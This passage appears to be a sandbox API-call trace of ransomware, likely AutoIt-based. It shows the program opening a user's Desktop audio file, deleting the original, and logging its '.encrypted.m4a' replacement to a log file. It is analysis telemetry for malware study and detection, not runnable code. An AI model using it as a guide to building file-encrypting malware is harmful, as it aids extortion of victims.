hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.914] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.914] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.914] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.914] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.914] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.914] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.914] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.914] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.914] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0029.914] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bn6b0ldlyx0l0guv_ y.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0029.915] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.915] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.915] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.915] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.915] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0029.915] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.915] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.916] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.916] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.916] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0029.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.916] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.916] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.917] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.917] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.917] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", lpFilePart=0x0) returned 0x3d [0029.917] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a2ad60, ftCreationTime.dwHighDateTime=0x1d5c4e4, ftLastAccessTime.dwLowDateTime=0x28b50320, ftLastAccessTime.dwHighDateTime=0x1d5bf09, ftLastWriteTime.dwLowDateTime=0x11b7cbe0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1092e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Bn6B0LdLyx0L0Guv_ Y.m4a", cAlternateFileName="BN6B0L~1.M4A")) returned 0x7c2100 [0029.917] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bn6b0ldlyx0l0guv_ y.m4a")) returned 1 [0029.918] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a2ad60, ftCreationTime.dwHighDateTime=0x1d5c4e4, ftLastAccessTime.dwLowDateTime=0x28b50320, ftLastAccessTime.dwHighDateTime=0x1d5bf09, ftLastWriteTime.dwLowDateTime=0x11b7cbe0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1092e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Bn6B0LdLyx0L0Guv_ Y.m4a", cAlternateFileName="BN6B0L~1.M4A")) returned 0 [0029.918] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.919] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.919] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.919] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.919] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.920] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.920] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.920] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.920] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.920] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0029.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.921] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.921] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0029.921] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x1db, lpOverlapped=0x0) returned 1 [0029.921] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0029.921] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.921] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0029.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.encrypted.m4a\r\n", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0029.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4a) returned 0x7f3630 [0029.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.encrypted.m4a\r\n", cchWideChar=74, lpMultiByteStr=0x7f3630, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 74 [0029.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.921] WriteFile (in: hFile=0x140, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x49, lpOverlapped=0x0) returned 1 [0029.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.922] CloseHandle (hObject=0x140) returned 1 [0029.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0029.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.924] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.924] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.924] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0029.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0029.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.924] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af588 [0029.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0029.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0029.925] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, 